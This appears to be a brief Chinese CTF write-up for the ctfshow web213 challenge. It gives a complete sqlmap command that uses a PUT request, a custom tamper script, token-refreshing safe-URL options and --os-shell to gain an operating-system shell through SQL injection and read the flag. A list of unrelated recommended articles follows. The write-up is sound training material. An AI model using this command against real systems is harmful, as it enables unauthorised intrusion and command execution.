ctfshow-web213

爱隐身的官人2025-11-11 17:56

-os--shell参数的使用

复制代码 
python sqlmap.py -u "http://b783c400-150f-4971-b2de-45dca654b75a.challenge.ctf.show/api/index.php" --method="PUT" --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=1vrv4fg7q4uid8i1lhma043h20" --safe-url="http://b783c400-150f-4971-b2de-45dca654b75a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web212.py --os-shell

有两个地方需要进行选择:如果是PHP则直接回车默认选择。

这两个地方需要选择正确才能拿到shell。

读取flag。

相关推荐
运维全栈笔记8 小时前
Linux安装配置Tomcat保姆级教程:从部署到性能调优
linux·服务器·中间件·tomcat·apache·web
必胜刻11 小时前
全面解析 Token:从入门到 JWT 实战
golang·状态模式·web·前后端交互
曲幽16 小时前
FastAPI 少有人提的实用技巧:把 Depends 依赖提到路由层,代码少写60%
python·fastapi·web·routes·depends·prefix·apiroute
里欧跑得慢1 天前
17. Flutter Hero动画实现:让界面过渡更加优雅
前端·css·flutter·web
曲幽2 天前
FastAPI 生产环境静态文件完全指南:从 /favicon.ico 404 到 HSTS 混合内容,一次全根治
python·fastapi·web·static·media·404·hsts·favicon·url_for
钛态2 天前
前端TypeScript高级技巧:让你的代码更安全
前端·vue·react·web
钛态3 天前
前端微前端架构:大项目的救命稻草还是自找麻烦?
前端·vue·react·web
里欧跑得慢3 天前
15. Web可访问性最佳实践:让每个用户都能平等访问
前端·css·flutter·web
钛态3 天前
前端趋势:别被时代抛弃
前端·vue·react·web
oscar9994 天前
在浏览器中使用 OpenCode
web·browser·opencode
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03Codex 接入 DeepSeek API 完整配置文档04【AI】2026 年具身智能模型和世界模型总结05裂开!ChatGPT 居然开始要手机号验证,附详细解决方法06零基础教你claude code 接入 deepseek V4072026年AI前瞻:量子AI、具身智能与科学发现的新纪元08在Windows 11上安装Docker的踩坑记录09实测可用|小米 MiMo 百万亿 Token 免费领,开发者速冲10CC-Switch & Claude 基于 Linux 服务器安装使用指南